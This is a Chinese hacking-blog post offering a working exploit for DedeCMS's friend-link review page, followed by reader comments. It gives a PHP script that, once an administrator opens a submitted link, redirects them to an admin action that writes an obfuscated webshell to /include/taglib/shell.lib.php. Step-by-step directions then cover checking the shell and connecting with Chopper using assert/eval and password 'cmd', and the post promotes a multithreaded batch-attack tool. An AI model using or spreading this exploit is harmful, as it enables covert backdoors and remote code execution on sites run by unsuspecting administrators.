dedeCMS友情链接getshell漏洞利用工具(附exp)

  • 内容
  • 相关

不多说一类多说的吧直接上exp


<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>
使用

代码存为PHP文件,上传到你的空间。去提前友连申请,网址填写你上传后的地址。

站长审核后台友情连接时会生成一句话地址为/include/taglib/shell.lib.php

御剑字典添加/include/taglib/shell.lib.php测试是否存活即可

最后菜刀访问传参一句话http://site.com/include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);

密码为cmd


当然也有大牛研究出来了工具

2017-07-13

使用说明

1、左侧右键导入网址
2、中间右键点击配置可打开右侧功能区
3、修改key.ini文件里面的www.xxx.com/dede.php 替换成自己的即可
4、扫描完毕之后点击开始获取即可获取验证码,点击手工插入即可进行插入功能,下次会自动获取验证码,直接输入
验证码,进行手工插入即可。
4、多线程批量扫描,可自定义线程,可以导入大量url工作。

管理员设置回复可下载

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360未收录] | [搜狗已收录]

本文链接:dedeCMS友情链接getshell漏洞利用工具(附exp) - https://www.0dayhack.com/post-389.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

669条评论
  1. avatar

    yangtianba Lv.1 Chrome 69.0.3497.100 Chrome 69.0.3497.100 Windows 7 x64 Edition Windows 7 x64 Edition 回复

    我要下载谢谢

    云南省临沧市 电信

    1. avatar

      yangtianba Lv.1 Chrome 69.0.3497.100 Chrome 69.0.3497.100 Windows 7 x64 Edition Windows 7 x64 Edition 回复

      66666666666

      云南省临沧市 电信

      1. avatar

        wanmidi Lv.1 Chrome 64.0.3282.140 Chrome 64.0.3282.140 Windows Windows 回复

        666666666a !~~~

        安徽省阜阳市 电信

        1. avatar

          2068039800 Lv.2 Chrome 70.0.3538.25 Chrome 70.0.3538.25 Windows 7 x64 Edition Windows 7 x64 Edition 回复

          很好。很强大

          四川省德阳市 移动

          1. avatar

            2068039800 Lv.2 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

            大神威武 谢谢 很好 很好很高尚a

            四川省德阳市 移动

            1. avatar

              2068039800 Lv.2 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

              大佬牛逼 谢谢了

              四川省德阳市 移动

              1. avatar

                2068039800 Lv.2 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

                大佬牛逼啊

                四川省德阳市 移动

                1. avatar

                  akdepuquan Lv.2 Chrome 75.0.3770.100 Chrome 75.0.3770.100 Windows 7 Windows 7 回复

                  66addsadfafksdnfsdnfnsdfnsdnklfs

                  日本

                  1. avatar

                    akdepuquan Lv.2 Chrome 75.0.3770.100 Chrome 75.0.3770.100 Windows 7 Windows 7 回复

                    大神威武 谢谢

                    日本

                    1. avatar

                      akdepuquan Lv.2 Chrome 75.0.3770.100 Chrome 75.0.3770.100 Windows 7 Windows 7 回复

                      大神威武 谢谢 很好 很好很高尚a

                      日本